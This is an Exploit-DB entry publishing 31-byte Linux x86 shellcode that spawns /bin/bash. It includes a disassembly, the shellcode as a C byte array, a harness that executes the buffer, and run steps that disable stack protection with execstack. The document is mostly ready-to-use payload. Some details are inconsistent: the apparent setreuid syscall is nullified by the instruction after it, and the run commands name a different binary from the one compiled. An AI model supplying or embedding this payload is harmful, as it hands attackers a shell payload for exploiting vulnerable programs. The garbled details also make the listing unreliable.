Linux/x86 - execve(/bin/bash) Shellcode (31 bytes)

EDB-ID:

38088

CVE:

N/A


Platform:

Linux_x86

Published:

2015-09-06

/*
---------------------------------------------------------------------------------------------------

Linux/x86 - execve(/bin/bash) - 31 bytes

Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]

Om Asato Maa Sad-Gamaya |
Tamaso Maa Jyotir-Gamaya |
Mrtyor-Maa Amrtam Gamaya |
Om Shaantih Shaantih Shaantih |

---------------------------------------------------------------------------------------------------
Disassembly of section .text:

 08048060 <.text>:
 8048060:	b0 46                	mov    $0x46,%al
 8048062:	31 c0                	xor    %eax,%eax
 8048064:	cd 80                	int    $0x80
 8048066:	eb 07                	jmp    0x804806f
 8048068:	5b                   	pop    %ebx
 8048069:	31 c0                	xor    %eax,%eax
 804806b:	b0 0b                	mov    $0xb,%al
 804806d:	cd 80                	int    $0x80
 804806f:	31 c9                	xor    %ecx,%ecx
 8048071:	e8 f2 ff ff ff       	call   0x8048068
 8048076:	2f                   	das    
 8048077:	62 69 6e             	bound  %ebp,0x6e(%ecx)
 804807a:	2f                   	das    
 804807b:	62 61 73             	bound  %esp,0x73(%ecx)
 804807e:	68                   	.byte 0x68
---------------------------------------------------------------------------------------------------

How To Run

$ gcc -o bash_shell bash_shell.c
$ execstack -s local_bash
$ ./ local_bash

---------------------------------------------------------------------------------------------------
*/
#include <stdio.h>
char sh[]="\xb0\x46\x31\xc0\xcd\x80\xeb\x07\x5b\x31\xc0\xb0\x0b\xcd\x80\x31\xc9\xe8\xf2\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68";
void main(int argc, char **argv)
{
	int (*func)();
	func = (int (*)()) sh;
	(int)(*func)();
}